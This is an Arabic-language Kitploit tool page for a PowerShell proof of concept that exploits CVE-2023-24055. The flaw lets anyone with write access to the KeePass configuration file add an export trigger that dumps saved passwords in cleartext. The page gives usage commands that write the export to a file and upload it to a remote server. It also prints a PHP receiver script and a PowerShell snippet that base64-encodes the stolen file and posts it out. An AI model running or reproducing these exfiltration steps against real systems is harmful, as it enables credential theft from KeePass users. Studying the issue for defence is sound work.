Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-24055 — CVE-2023-24055 POC مكتوب بلغة PowerShell. | Kitploit
أدوات/GitHubGitHub/yosef0x01/cve-2023-24055
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالتسريب البياناتالتعلم والتعليم
GitHubyosef0x01/cve-2023-24055

CVE-2023-24055

CVE-2023-24055 POC مكتوب بلغة PowerShell.

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

alt text

إخلاء مسؤولية

هذا السكربت مخصص لأغراض تعليمية وعرضية فقط. لا يؤيد المؤلف استخدام هذا السكربت في أي أنشطة إجرامية أو خبيثة، ويجب استخدامه فقط حيث يُسمح بذلك صراحةً وبإذن مناسب.

يجب استخدام هذا السكربت بحذر، حيث إنه سيعدّل ملف تهيئة KeePass ويحذف أي مشغّلات (triggers) تم تكوينها مسبقًا. قد يؤدي استخدام هذا السكربت إلى سلوك غير متوقع وربما كسر تطبيق KeePass. استخدمه على مسؤوليتك الخاصة.

مقدمة

يوضح هذا السكربت الثغرة الأمنية ** المُتنازَع عليها ** (CVE-2023-24055) في KeePass حتى الإصدار 2.53 (في التثبيت الافتراضي)، حيث تسمح لمهاجم لديه حق الوصول للكتابة إلى ملف تهيئة XML بالحصول على كلمات المرور بالنص الصريح عن طريق إضافة مشغّل تصدير. لاحظ أن موقف البائع هو أن قاعدة بيانات كلمات المرور ليست مصممة لتكون آمنة ضد مهاجم لديه ذلك المستوى من الوصول إلى الكمبيوتر الشخصي.

المراجع:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
  • https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
  • https://keepass.info/

التعليمات

لاستخدام هذا السكربت، قم بتشغيله في PowerShell ووفّر المعاملات اللازمة. المعاملات الإلزامية هي:

  • -filename: المسار الكامل واسم الملف الذي ستُصدَّر إليه كلمات المرور.

المعاملات الاختيارية هي:

  • -uploadURL: يُستخدم هذا المفتاح لتحديد أن البيانات يجب أن تُرفع إلى عنوان URL المحدد.
  • -url: عنوان URL الذي يجب رفع البيانات إليه.

مثال للاستخدام

تصدير كلمات المرور بالنص الصريح:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt

تصدير كلمات المرور بالنص الصريح ورفع ملف التصدير إلى خادم الويب:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php

مساعدة مفصلة:

root@kitploit:~
get-help .\KlearPass.ps1 -Detailed

مثال على سكربت PHP لرفع ملف على خادم الويب

root@kitploit:~
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    $filename = $target_directory . $_POST['filename'];
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>

مثال على سكربت PowerShell لاختبار رفع PHP

root@kitploit:~
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");

الاعتمادات

  • استند السكربت في البداية إلى كود موجود في https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
  • فكرة تهريب ملف التصدير تُنسب إلى https://github.com/alt3kx/CVE-2023-24055_PoC.
تنزيل الأداة